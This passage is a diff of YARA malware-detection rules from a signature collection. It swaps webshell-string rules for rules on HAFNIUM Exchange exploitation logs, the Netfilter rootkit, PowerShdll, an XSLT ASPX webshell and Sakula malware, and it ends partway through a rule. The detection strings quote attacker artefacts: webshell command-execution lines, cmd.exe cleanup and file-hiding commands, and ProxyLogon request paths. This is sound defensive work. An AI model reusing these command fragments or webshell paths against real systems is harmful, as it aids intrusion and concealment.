-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4475-L4487"
+		description = "Detects forensic artefacts found in HAFNIUM intrusions exploiting CVE-2021-27065"
+		author = "Florian Roth (Nextron Systems)"
+		id = "dcc1f741-cab0-5a0b-a261-a6bd05989723"
+		date = "2021-03-02"
+		modified = "2023-12-05"
+		reference = "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium_log_sigs.yar#L2-L13"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "49ad9117c96419c35987aaa7e2230f63"
-		logic_hash = "d6d2a3999f2e8ceb70f57697c0a845edbbcfce0aba151ec6a0ac23f55265cd47"
+		logic_hash = "9306cf177928266ea921461e9da80ad5bb37e1e0848559898a414956cfbc2b49"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "LOG, CVE-2021-27065"
 
 	strings:
-		$s0 = "Welcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy"
-		$s1 = "Mode Shell v1.0</font></span>"
-		$s2 = "has been already loaded. PHP Emperor <xb5@hotmail."
+		$s1 = "S:CMD=Set-OabVirtualDirectory.ExternalUrl='" ascii wide fullword
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Mysql_Php_Php
+rule SIGNATURE_BASE_EXPL_LOG_CVE_2021_26858_Exchange_Forensic_Artefacts_Mar21_1 : LOG CVE_2021_26858
 {
 	meta:
-		description = "Semi-Auto-generated  - file mysql.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "41730336-0dce-5ed9-95b0-c911a4e3cb48"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4488-L4500"
+		description = "Detects forensic artefacts found in HAFNIUM intrusions exploiting CVE-2021-26858"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f6fa90c7-c2c0-56db-bf7b-dc146761a995"
+		date = "2021-03-02"
+		modified = "2021-03-04"
+		reference = "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium_log_sigs.yar#L15-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "12bbdf6ef403720442a47a3cc730d034"
-		logic_hash = "60e235310f378698ffcc3ae6a07ab5dd94a660ca4b1504cc878d9741f751d5d1"
-		score = 75
+		logic_hash = "0a8296b7e990e52330412288e9ff71e08a5258fc63c4754e6d0e6d64302f55e6"
+		score = 65
 		quality = 85
-		tags = ""
+		tags = "LOG, CVE-2021-26858"
 
 	strings:
-		$s0 = "action=mysqlread&mass=loadmass\">load all defaults"
-		$s2 = "if (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthru"
-		$s3 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = "
+		$xr1 = /POST (\/owa\/auth\/Current\/themes\/resources\/logon\.css|\/owa\/auth\/Current\/themes\/resources\/owafont_ja\.css|\/owa\/auth\/Current\/themes\/resources\/lgnbotl\.gif|\/owa\/auth\/Current\/themes\/resources\/owafont_ko\.css|\/owa\/auth\/Current\/themes\/resources\/SegoeUI-SemiBold\.eot|\/owa\/auth\/Current\/themes\/resources\/SegoeUI-SemiLight\.ttf|\/owa\/auth\/Current\/themes\/resources\/lgnbotl\.gif)/
 
 	condition:
-		1 of them
+		$xr1
 }
-rule SIGNATURE_BASE_Worse_Linux_Shell_Php
+rule SIGNATURE_BASE_LOG_Exchange_Forensic_Artefacts_Cleanup_Activity_Mar21_1 : LOG
 {
 	meta:
-		description = "Semi-Auto-generated  - file Worse Linux Shell.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "e223e2a9-7c7a-597a-8b90-a63ee11805ea"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4501-L4512"
+		description = "Detects forensic artefacts showing cleanup activity found in HAFNIUM intrusions exploiting"
+		author = "Florian Roth (Nextron Systems)"
+		id = "95b19544-147b-5496-b717-669cbc488179"
+		date = "2021-03-08"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/jdferrell3/status/1368626281970024448"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium_log_sigs.yar#L48-L65"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8338c8d9eab10bd38a7116eb534b5fa2"
-		logic_hash = "47801296b700e85f9e08857eb06f845ef8ed3f88b7d0de34d4b7c47cef6cc7fb"
-		score = 75
+		logic_hash = "12e5b76dafcae13f1eb21913ae0bde233152fd8b9d29f073893418ac9f742de3"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "LOG"
 
 	strings:
-		$s1 = "print \"<tr><td><b>Server is:</b></td><td>\".$_SERVER['SERVER_SIGNATURE'].\"</td"
-		$s2 = "print \"<tr><td><b>Execute command:</b></td><td><input size=100 name=\\\"_cmd"
+		$x1 = "cmd.exe /c cd /d C:/inetpub/wwwroot/aspnet_client" ascii wide
+		$x2 = "cmd.exe /c cd /d C:\\inetpub\\wwwroot\\aspnet_client" ascii wide
+		$s1 = "aspnet_client&del '"
+		$s2 = "aspnet_client&attrib +h +s +r "
+		$s3 = "&echo [S]"
 
 	condition:
-		1 of them
+		1 of ( $x* ) or 2 of them
 }
-rule SIGNATURE_BASE_Cyberlords_Sql_Php_Php
+rule SIGNATURE_BASE_EXPL_LOG_CVE_2021_27055_Exchange_Forensic_Artefacts : LOG
 {
 	meta:
-		description = "Semi-Auto-generated  - file cyberlords_sql.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "41730336-0dce-5ed9-95b0-c911a4e3cb48"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4513-L4526"
+		description = "Detects suspicious log entries that indicate requests as described in reports on HAFNIUM activity"
+		author = "Zach Stanford - @svch0st, Florian Roth"
+		id = "8b0110a9-fd03-5f7d-bdd8-03ff48bcac68"
+		date = "2021-03-10"
+		modified = "2021-03-15"
+		reference = "https://www.praetorian.com/blog/reproducing-proxylogon-exploit/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium_log_sigs.yar#L67-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "03b06b4183cb9947ccda2c3d636406d4"
-		logic_hash = "b3286f9fd86c90c5afc79801b6d65c9ae52ee1c37da93ff15461d84f37ef8019"
-		score = 75
-		quality = 85
-		tags = ""
+		logic_hash = "131ff0ce189dfeace0922000b0d15dfb5a1270bee8fba8e4d66aa75b1d3f864f"
+		score = 65
+		quality = 60
+		tags = "LOG"
 
 	strings:
-		$s0 = "Coded by n0 [nZer0]"
-		$s1 = " www.cyberlords.net"
-		$s2 = "U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAAMUExURf///wAAAJmZzAAAACJoURkAAAAE"
-		$s3 = "return \"<BR>Dump error! Can't write to \".htmlspecialchars($file);"
+		$x1 = "ServerInfo~" ascii wide
+		$sr1 = /\/ecp\/[0-9a-zA-Z]{1,3}\.js/ ascii wide
+		$s1 = "/ecp/auth/w.js" ascii wide
+		$s2 = "/owa/auth/w.js" ascii wide
+		$s3 = "/owa/auth/x.js" ascii wide
+		$s4 = "/ecp/main.css" ascii wide
+		$s5 = "/ecp/default.flt" ascii wide
+		$s6 = "/owa/auth/Current/themes/resources/logon.css" ascii wide
 
 	condition:
-		1 of them
+		$x1 and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_Cmd_Asp_5_1_Asp
+rule SIGNATURE_BASE_LOG_CVE_2021_27065_Exchange_Forensic_Artefacts_Mar21_2 : LOG
 {
 	meta:
-		description = "Semi-Auto-generated  - file cmd-asp-5.1.asp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "fc204ab8-892d-5435-a737-a185ca32e938"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4527-L4538"
+		description = "Detects suspicious log entries that indicate requests as described in reports on HAFNIUM activity"
+		author = "Florian Roth (Nextron Systems)"
+		id = "37a26def-b360-518e-a4ab-9604a5b39afd"
+		date = "2021-03-10"
+		modified = "2023-12-05"
+		reference = "https://www.praetorian.com/blog/reproducing-proxylogon-exploit/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium_log_sigs.yar#L92-L104"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8baa99666bf3734cbdfdd10088e0cd9f"
-		logic_hash = "a41c83da1a65e67b6f4ac6ad7cc8702486957ab0c7dda658d071e603338c324b"
-		score = 75
-		quality = 85
-		tags = ""
+		logic_hash = "13e2e46689bc0e87c3cf13dc2ce213c384afe6c03c21e62a467974a0518c12da"
+		score = 65
+		quality = 60
+		tags = "LOG"
 
 	strings:
-		$s0 = "Call oS.Run(\"win.com cmd.exe /c del \"& szTF,0,True)" fullword
-		$s3 = "Call oS.Run(\"win.com cmd.exe /c \"\"\" & szCMD & \" > \" & szTF &" fullword
+		$sr1 = /GET \/rpc\/ &CorrelationID=<empty>;&RequestId=[^\n]{40,600} (200|301|302)/
 
 	condition:
-		1 of them
+		$sr1
 }
-rule SIGNATURE_BASE_Pws_Php_Php
+rule SIGNATURE_BASE_Base64_PS1_Shellcode
 {
 	meta:
-		description = "Semi-Auto-generated  - file pws.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "1ec47c33-dbec-50bd-b4b0-8f00b704a816"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4539-L4551"
+		description = "Detects Base64 encoded PS1 Shellcode"
+		author = "Nick Carr, David Ledbetter"
+		id = "7c3cec3b-a192-5bfd-b4f1-22b1afeb717e"
+		date = "2018-11-14"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/ItsReallyNick/status/1062601684566843392"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_ps1_shellcode.yar#L1-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ecdc6c20f62f99fa265ec9257b7bf2ce"
-		logic_hash = "98dae8aab5bfd58f4264e318f5a5b5900b38687386f9d7f09c31da0f51d57bc0"
-		score = 75
+		logic_hash = "fac6f41965eb2209f1552763800d6a2b172f28cd29bb7586d180654aab1e6d56"
+		score = 65
 		quality = 85
 		tags = ""
 
 	strings:
-		$s0 = "<div align=\"left\"><font size=\"1\">Input command :</font></div>" fullword
-		$s1 = "<input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br>" fullword
-		$s4 = "<input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>"
+		$substring = "AAAAYInlM"
+		$pattern1 = "/OiCAAAAYInlM"
+		$pattern2 = "/OiJAAAAYInlM"
 
 	condition:
-		2 of them
+		$substring and 1 of ( $p* )
 }
-rule SIGNATURE_BASE_PHP_Shell_Php_Php
+rule SIGNATURE_BASE_MAL_Netfilter_Dropper_Jun_2021_1_1 : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file PHP Shell.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "6978126c-5414-52d2-b085-6e5589716d93"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4552-L4563"
+		description = "Detects the dropper of Netfilter rootkit"
+		author = "Arkbird_SOLG"
+		id = "d91f48aa-9580-572d-a72c-19b80624cdbe"
+		date = "2020-06-18"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/struppigel/status/1405483373280235520"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_netfilter.yar#L4-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a2f8fa4cce578fc9c06f8e674b9e63fd"
-		logic_hash = "2d5b6e08bfe9e1551dab12b01189dadc924c097427c996684bab96c48d528395"
+		logic_hash = "b70eb5d2d234d0f523c41fa146f315cf7239bbe7a988b393e75ea6cf6aa438d3"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "a5c873085f36f69f29bb8895eb199d42ce86b16da62c56680917149b97e6dac"
+		hash2 = "659e0d1b2405cadfa560fe648cbf6866720dd40bb6f4081d3dce2dffe20595d9"
+		hash3 = "d0a03a8905c4f695843bc4e9f2dd062b8fd7b0b00103236b5187ff3730750540"
+		tlp = "White"
+		adversary = "Chinese APT Group"
 
 	strings:
-		$s0 = "echo \"</form><form action=\\\"$SFileName?$urlAdd\\\" method=\\\"post\\\"><input"
-		$s1 = "echo \"<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\"><input type="
+		$seq1 = { b8 ff 00 00 00 50 b8 00 00 00 00 50 8d 85 dd fe ff ff 50 e8 ?? 0d 00 00 83 c4 0c b8 00 00 00 00 88 85 dc fd ff ff b8 ff 00 00 00 50 b8 00 00 00 00 50 8d 85 dd fd ff ff 50 e8 ?? 0d 00 00 83 c4 0c b8 00 00 50 00 50 e8 ?? 0d 00 00 83 c4 04 89 85 d8 fd ff ff 8b 85 d8 fd ff ff 89 85 d4 fd ff ff b8 00 00 50 00 50 b8 00 00 00 00 50 8b 85 d8 fd ff ff 50 e8 ?? 0c 00 00 83 c4 0c 8b 45 0c 8b 8d d8 fd ff ff 89 08 b8 3c 00 00 00 50 b8 00 00 00 00 50 8d 85 98 fd ff ff 50 e8 ?? 0c 00 00 83 c4 0c b8 3c 00 00 00 89 85 98 fd ff ff 8d 85 98 fd ff ff 83 c0 10 8d 8d dc fe ff ff 89 08 8d 85 98 fd ff ff 83 c0 14 b9 00 01 00 00 89 08 8d 85 98 fd ff ff 83 c0 2c 8d 8d dc fd ff ff 89 08 8d 85 98 fd ff ff 83 c0 30 b9 00 01 00 00 89 08 b8 0a 31 40 00 50 e8 ?? 0c 00 00 89 85 94 fd ff ff b8 16 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0c 00 00 89 45 fc b8 28 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0c 00 00 89 45 f8 b8 36 31 40 00 50 8b 85 94 fd ff ff 50 e8 [2] 00 00 89 45 f4 b8 47 31 40 00 50 8b 85 94 fd ff ff 50 e8 [2] 00 00 89 45 f0 b8 58 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 ec b8 69 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 e8 b8 7a 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 e4 b8 8e 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 e0 8b 45 08 50 e8 ?? 0b 00 00 83 c4 04 8d 8d 98 fd ff ff 51 b9 00 00 00 00 51 50 8b 45 08 50 8b 45 fc ff d0 85 }
+		$seq2 = { b8 00 00 00 00 89 85 90 fd ff ff b8 00 00 00 00 89 85 8c fd ff ff b8 00 00 00 00 89 85 88 fd ff ff b8 00 00 00 00 89 85 84 fd ff ff b8 04 00 00 00 89 85 80 fd ff ff b8 00 00 00 00 88 85 7f f5 ff ff b8 00 08 00 00 50 b8 00 00 00 00 50 8d 85 80 f5 ff ff 50 e8 ?? 0b 00 00 83 c4 0c b8 00 00 00 00 50 b8 00 00 00 00 50 b8 00 00 00 00 50 b8 00 00 00 00 50 b8 9d 31 40 00 50 8b 45 f8 ff d0 89 85 90 fd ff ff 8b 85 }
+		$s1 = "%s\\netfilter.sys" fullword ascii
+		$s2 = "SYSTEM\\CurrentControlSet\\Services\\netfilter" fullword ascii
+		$s3 = "\\\\.\\netfilter" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize > 6KB and filesize < 1000KB and ( all of ( $seq* ) or 2 of ( $s* ) )
 }
-rule SIGNATURE_BASE_Ayyildiz_Tim___AYT__Shell_V_2_1_Biz_Html
+rule SIGNATURE_BASE_MAL_Netfilter_May_2021_1_1 : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file Ayyildiz Tim  -AYT- Shell v 2.1 Biz.html.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "d50a8669-fd28-59d2-9f00-f4fe2b85dc22"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4564-L4577"
+		description = "Detects Netfilter rootkit"
+		author = "Arkbird_SOLG"
+		id = "0ac01eb3-435b-52b0-b8e8-ace2ebb34f60"
+		date = "2020-06-18"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/struppigel/status/1405483373280235520"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_netfilter.yar#L28-L52"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "8a8c8bb153bd1ee097559041f2e5cf0a"
-		logic_hash = "9e2d56b49df65a2c13e15f97ec91cdbb6852d86e86f921d7c8a4db82cbea12f5"
+		logic_hash = "ba72bbc38c27d0c8d6eea7d513c3ca40276edd929c93abae4098639f7d7649a5"
 		score = 75
-		quality = 85
-		tags = ""
+		quality = 83
+		tags = "FILE"
+		hash1 = "63d61549030fcf46ff1dc138122580b4364f0fe99e6b068bc6a3d6903656aff0"
+		hash2 = "8249e9c0ac0840a36d9a5b9ff3e217198a2f533159acd4bf3d9b0132cc079870"
+		hash3 = "d64f906376f21677d0585e93dae8b36248f94be7091b01fd1d4381916a326afe"
+		tlp = "White"
+		adversary = "Chinese APT Group"
 
 	strings:
-		$s0 = "Ayyildiz"
-		$s1 = "TouCh By iJOo"
-		$s2 = "First we check if there has been asked for a working directory"
-		$s3 = "http://ayyildiz.org/images/whosonline2.gif"
+		$seq1 = { 48 8b 05 a9 57 ff ff 45 33 c9 49 b8 32 a2 df 2d 99 2b 00 00 48 85 c0 74 05 49 3b c0 75 38 0f 31 48 c1 e2 20 48 8d 0d 85 57 ff ff 48 0b c2 48 33 c1 48 89 05 78 57 ff ff 66 44 89 0d 76 57 ff ff 48 8b 05 69 57 ff ff 48 85 c0 75 0a 49 8b c0 48 89 05 5a 57 ff ff 48 f7 d0 48 89 05 58 57 }
+		$seq2 = { 48 83 ec 38 48 83 64 24 20 00 48 8d 05 83 4c 00 00 48 8d 15 24 d1 00 00 48 89 44 24 28 48 8d 4c 24 20 e8 4d 05 00 00 85 c0 78 16 4c 8d 05 22 d1 00 00 83 ca ff 48 8d 0d 00 d1 00 00 e8 39 05 00 00 48 83 c4 }
+		$seq3 = { 45 33 c0 48 8d 4c 24 40 41 8d 50 01 ff 15 5d 62 00 00 c6 84 24 88 00 00 00 01 48 8d 84 24 88 00 00 00 48 89 46 18 48 8d 0d e2 fe ff ff 48 89 9e c0 00 00 00 48 8d 44 24 40 48 89 46 50 48 8d 44 24 30 48 89 46 48 65 48 8b 04 25 88 01 00 00 48 89 86 98 00 00 00 48 8b 86 b8 00 00 00 40 88 7e 40 c6 40 b8 06 4c 89 78 e0 48 89 58 e8 c7 40 c0 01 00 00 00 c7 40 c8 0d 00 00 00 48 89 58 d0 48 8b 86 b8 00 00 00 48 89 48 f0 48 8d 4c 24 40 48 89 48 f8 c6 40 bb e0 48 8b 43 28 48 85 c0 74 2f 48 8b 48 10 48 85 c9 74 07 48 21 78 10 4c 8b f1 48 8b 08 48 85 c9 74 06 48 21 38 48 8b e9 48 8b 48 08 48 85 c9 74 08 48 83 60 08 00 48 8b f9 48 8b d6 49 8b cf ff 15 74 61 00 00 3d 03 01 00 00 75 19 48 83 64 24 20 00 48 8d 4c 24 40 41 b1 01 45 33 c0 33 d2 ff 15 64 61 00 00 48 8b 43 28 48 85 c0 74 1a 4d }
+		$seq4 = { 8b 84 24 80 00 00 00 48 8d 54 24 38 48 8b 4c 24 30 44 8b ce 89 44 24 28 45 33 c0 48 89 7c 24 20 ff 15 66 2e 00 00 48 8b 4c 24 30 8b d8 ff 15 49 2e 00 00 48 8b 4c 24 30 ff 15 26 2d 00 00 8b }
+		$s1 = "%sc=%s" fullword ascii
+		$s2 = { 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 }
+		$s3 = "NETIO.SYS" fullword ascii
 
 	condition:
-		2 of them
+		uint16( 0 ) == 0x5a4d and filesize > 20KB and filesize < 1000KB and ( 3 of ( $seq* ) or 2 of ( $s* ) )
 }
-rule SIGNATURE_BASE_EFSO_2_Asp
+rule SIGNATURE_BASE_Powershdll
 {
 	meta:
-		description = "Semi-Auto-generated  - file EFSO_2.asp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "f0566790-b41c-5167-b7ec-19e7d04256d1"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4578-L4589"
+		description = "Detects hack tool PowerShdll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cc0e01ca-77f0-5665-8b1e-48c8e947d0d3"
+		date = "2017-08-03"
+		modified = "2023-12-05"
+		reference = "https://github.com/p3nt4/PowerShdll"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershdll.yar#L9-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b5fde9682fd63415ae211d53c6bfaa4d"
-		logic_hash = "15e5419854bcbb08f28fff1e266cca7a004f01ec0a5c313c107ec17c3aa7ffee"
+		logic_hash = "6c93eca642cc29e6ce661e6ea975bc1a88fff4e6a4825c1da3f82b3a6701392a"
 		score = 75
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4d33bc7cfa79d7eefc5f7a99f1b052afdb84895a411d7c30045498fd4303898a"
+		hash2 = "f999db9cc3a0719c19f35f0e760f4ce3377b31b756d8cd91bb8270acecd7be7d"
 
 	strings:
-		$s0 = "Ejder was HERE"
-		$s1 = "*~PU*&BP[_)f!8c2F*@#@&~,P~P,~P&q~8BPmS~9~~lB~X`V,_,F&*~,jcW~~[_c3TRFFzq@#@&PP,~~"
+		$x1 = "rundll32 PowerShdll,main -f <path>" fullword wide
+		$x2 = "\\PowerShdll.dll" ascii
+		$x3 = "rundll32 PowerShdll,main <script>" fullword wide
 
 	condition:
-		2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Lamashell_Php
+rule SIGNATURE_BASE_WEBSHELL_ASPX_Xsltransform_Aug21 : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file lamashell.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "cbbb3377-ef9c-5fd1-a8b8-2b730fb5ef28"
-		date = "2016-02-15"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4590-L4602"
+		description = "Detects an ASPX webshell utilizing XSL Transformations"
+		author = "Max Altgelt"
+		id = "44254084-a717-59e6-a3ac-eca3c1c864a8"
+		date = "2020-02-23"
+		modified = "2023-12-05"
+		reference = "https://gist.github.com/JohnHammond/cdae03ca5bc2a14a735ad0334dcb93d6"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/webshell_xsl_transform.yar#L1-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "de9abc2e38420cad729648e93dfc6687"
-		logic_hash = "5e156c3057338fa7b306b91dd979851dd56b8b698cfe99e1d7b6d096a4c580e7"
+		logic_hash = "3ac0b50adc4c56769d0248e213e9426a22e0f5086bf081da57f835ff1c77b716"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$s0 = "lama's'hell" fullword
-		$s1 = "if($_POST['king'] == \"\") {"
-		$s2 = "if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir.\"/\".$_FILES['f"
+		$csharpshell = "Language=\"C#\"" nocase
+		$x1 = "<root>1</root>"
+		$x2 = ".LoadXml(System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String("
+		$s1 = "XsltSettings.TrustedXslt"
+		$s2 = "Xml.XmlUrlResolver"
+		$s3 = "FromBase64String(Request[\""
 
 	condition:
-		1 of them
+		filesize < 500KB and $csharpshell and ( 1 of ( $x* ) or all of ( $s* ) )
 }
-rule SIGNATURE_BASE_Ajax_PHP_Command_Shell_Php
+rule SIGNATURE_BASE_Malware_Sakula_Xorloop : FILE
 {
 	meta:
-		description = "Semi-Auto-generated  - file Ajax_PHP Command Shell.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "cae2e035-ae7b-589b-b2d9-e709028274c5"
-		date = "2016-02-15"
-		modified = "2025-11-03"
+		description = "XOR loops from Sakula malware"
+		author = "David Cannings"
+		id = "9349b7e4-560c-5d8b-94d9-cbb9fd09e132"
+		date = "2016-06-13"
+		modified = "2023-01-27"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4603-L4615"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sakula.yar#L1-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "93d1a2e13a3368a2472043bd6331afe9"
-		logic_hash = "37cba26018f3d37194a143871012a61a7bcee6775d2cf5f93a52b779010d3260"
+		hash = "fc6497fe708dbda9355139721b6181e7"
+		logic_hash = "b3c3131693e18ce2cf26786a93b61d39d90703d8c827de1340f85377fe7b59de"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$s1 = "newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>"
-		$s2 = "Empty Command..type \\\"shellhelp\\\" for some ehh...help"
-		$s3 = "newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enct"
+		$opcodes_decode_loop01 = { 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B }
+		$opcodes_decode_loop02 = { 8B 45 08 8D 0C 02 8A 01 84 C0 74 08 3C ?? 74 04 34 ?? 88 01 }
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5A4D and any of ( $opcodes* )
 }
-rule SIGNATURE_BASE_Jspwebshell_1_2_Jsp
+rule SIGNATURE_BASE_Malware_Sakula_Memory
 {
 	meta:
-		description = "Semi-Auto-generated  - file JspWebshell 1.2.jsp.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "edfe6a3d-7d56-52ad-a376-cec5722e87b7"
-		date = "2016-02-15"
-		modified = "2025-11-03"
+		description = "Sakula malware - strings after unpacking (memory rule)"
+		author = "David Cannings"
+		id = "328e3707-d11d-5b7f-bec4-18a42a2c658b"
+		date = "2016-06-13"
+		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
